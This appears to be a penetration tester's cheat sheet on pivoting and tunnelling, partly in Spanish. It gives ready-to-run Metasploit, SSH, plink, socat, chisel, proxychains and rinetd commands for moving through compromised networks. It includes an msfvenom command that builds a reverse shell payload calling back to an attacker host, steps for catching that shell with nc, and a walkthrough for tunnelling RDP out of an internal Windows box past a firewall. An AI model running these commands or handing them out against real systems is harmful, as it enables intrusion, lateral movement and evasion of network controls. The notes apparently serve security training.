PORT FORWARDING “port to port”:
MSF
Most platforms
Forward: Get meterpreter session on one of the dual homed machines portfwd add -l 4445 -p 4443 -r 10.1.1.1 Use -R to make it reverse
SSH
| in kali
-R 8081:172.24.0.2:80 (on my Kali machine listen on 8081, get it from 172.24.0.2:80)
<KALI 10.1.1.1>:8081<————<REMOTE 172.24.0.2>:80
Now you can access 172.24.0.2:80, which you didn’t have direct access to
-L 8083:127.0.0.1:8084 (on your machine listen on 8083, send it to my Kali machine on 8084)
<KALI 127.0.0.1>:8084<————<REMOTE 10.1.1.230>:8083<————
:XXXX
run nc on port 8084, and if 10.1.1.230:8083 receives a reverse shell, you will get it
| For reverse shell:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.1.1.230 LPORT=8083 -f exe -o shell
Run it on 2nd remote target to get a shell on Kali
Or if you didn’t have an SSH session, then SSH to your Kali from target machine: On Kali: service ssh start “add a user, give it /bin/false in /etc/passwd”
ssh - -R 12345:192.168.122.228:5986 test@10.1.1.1
PLINK
Just like SSH, on Windows service ssh start , and transfer /usr/share/windows-binaries/plink.exe to the target machine
On Target:
plink.exe 10.1.1.1 -P 22 -C -N -L 0.0.0.0:4445:10.1.1.1:4443 -l KALIUSER -pw PASS
SOCAT
For linux
Forward your 8083 to 62.41.90.2:443
./socat TCP4-LISTEN:8083,fork TCP4:62.41.90.2:443
CHISEL
Most platforms
Remote static tunnels “port to port”:
On Kali “reverse proxy listener”:
./chisel server -p 8000 -reverse
General command:
./chisel client <YOUR IP>:<YOUR CHISEL SERVER PORT> L/R:[YOUR LOCAL IP]:<TUNNEL LISTENING PORT>:<TUNNEL TARGET>:<TUNNEL PORT>
Remote tunnels “access IP:PORT you couldn’t access before”: On Target:
./chisel client 10.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80
Local tunnels “listen on the target for something, and send it to us”: On Target:
./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003
DYNAMIC “port to any”:
setup proxychains with socks5 on 127.0.0.1:1080 Or set up socks5 proxy on firefox For nmap use -Pn -sT or use tcp scanner in msf
MSF
Most platforms
Get meterpreter session on one of the dual homed machines Auto route to 10.1.1.0 (multi/manage/autoroute) Start socks proxy (auxiliary/server/socks4a)
SSH
For Linux
-D1080
PLINK
Just like SSH, on Windows On Target:
plink.exe 10.1.1.1 -P 22 -C -N -D 1080 -l KALIUSER -pw PASS
CHISEL
Most platforms
On Kali:
./chisel server -p 8000 -reverse
On Target:
./chisel client 10.1.1.1:8000 R:8001:127.0.0.1:1080
./chisel server -p 8001 --socks5
On Kali:
./chisel client 127.0.0.1:8001 socks
EXAMPLE
c:> mstsc (el rdesktop de windows)
supongamos que tenemos un target (lopez) que queremos conectar a un server (w2003 67.23.72.109) por mstsc, el firewall de lopez deja salir paketes solo por el puerto 80, para poder usar el puerto 3389 vamos a necesitar otra maquina que nos haga de proxy(kali 208.88.127.99)
Pasos
1 En Kali usamos rinetd
root@kali: vim /etc/rinetd.conf
#bindaddress bindport connectaddress connectport
208.88.127.99 80 67.23.72.109 3389
root@kali: /etc/init.d/rinetd restart
2 desde lopez nos conectamos a nuestro proxy machine en mstsc
3 profit
rdesktop case
tengo shell en una windows box interna no routeable y le hice descargar plink
- Nos conectamos con putty(plink) a nuestra kali(.99) y redirigimos el puerto 3389 en windows al 3390 en kali
C:> Plink -l root -pw uberpass 208.88.127.99 -R 3390:127.0.0.1:3389root@kali:netsta -antl | grep LISTENING <-nos deberia mostrar el 3390 escuchando
#abrimios otra terminal y dejamos esa abierta que esta tuneleando
root@kali: rdesktop 127.0.0.1:3390 <- nos deberia mostrar el remote desktop de windows
PROXYCHAINS
root@kali:ssh -D 8080 root@admin.megacorpone.com
root@admin: ifconfig (172.16.40.10)
#primero configuramos proxychains para que use el socks 8080
root@kali: proxychains <tool>
ex:
root@kali: proxychains nmap -p 3389 -sT -Pn 172.16.40.18-29 --open
|s-CHAINS| ..... BLABLA
...
(172.168.40.20)
3389 open
root@kali: proxychains rdesktop 172.168.40.20
https://hkashfi.blogspot.com.ar/2008/04/bypassing-firewalls-with-port_23.html